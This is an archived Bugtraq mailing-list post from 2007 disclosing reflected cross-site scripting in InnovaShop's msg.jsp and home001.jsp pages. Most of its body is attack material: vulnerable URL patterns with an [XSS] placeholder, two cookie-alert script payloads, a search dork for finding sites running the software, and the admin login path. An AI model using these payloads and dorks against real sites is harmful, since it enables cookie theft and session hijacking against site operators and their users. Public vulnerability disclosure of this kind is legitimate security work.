Deprecated: The each() function is deprecated. This message will be suppressed on further calls in /home/zhenxiangba/zhenxiangba.com/public_html/phproxy-improved-master/index.php on line 456
InnovaShop?® (mgs.jps) Cross Siting Scripting

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

InnovaShop?® (mgs.jps) Cross Siting Scripting

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: InnovaShop?® (mgs.jps) Cross Siting Scripting
From: jose luis góngora fernández <sys-project@xxxxxxxxxxx>
Date: Mon, 15 Oct 2007 18:55:53 +0000

# InnovaShop?® (mgs.jps) Cross Siting Scripting
# Download:
# http://www.innovaage.com/
# http://www.innovaportal.com/
# Bug found by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Site developed by InnovaAge?®" / "Powered by InnovaPortal©"
# Stop lammer

# Exploit In (XSS):

http://www.server/path/msg.jsp?msg=[XSS]
http://www.server/path/tc/contents/home001.jsp?contentid=[XSS]
http://www.server/innovashop/msg.jsp?msg=[XSS]
http://www.server/innovashop/tc/contents/home001.jsp?contentid=[XSS]
....all...

# Cross Siting Scripting (Code):

<script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>

# Admin Login:

http://server/admin/

//---------------------------------------\\

Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández

_________________________________________________________________

Grandes éxitos, superhéroes, imitaciones, cine y TV...http://es.msn.kiwee.com/ Lo mejor para tu móvil.

Prev by Date: SYMSA-2007-010: Microsoft ActiveSync 4.x Weak Password Obfuscation
Next by Date: Stringbeans (Portal) - Lang Parameter Cross-Site Scripting Vulnerability
Previous by thread: SYMSA-2007-010: Microsoft ActiveSync 4.x Weak Password Obfuscation
Next by thread: Stringbeans (Portal) - Lang Parameter Cross-Site Scripting Vulnerability
Index(es):
- Date
- Thread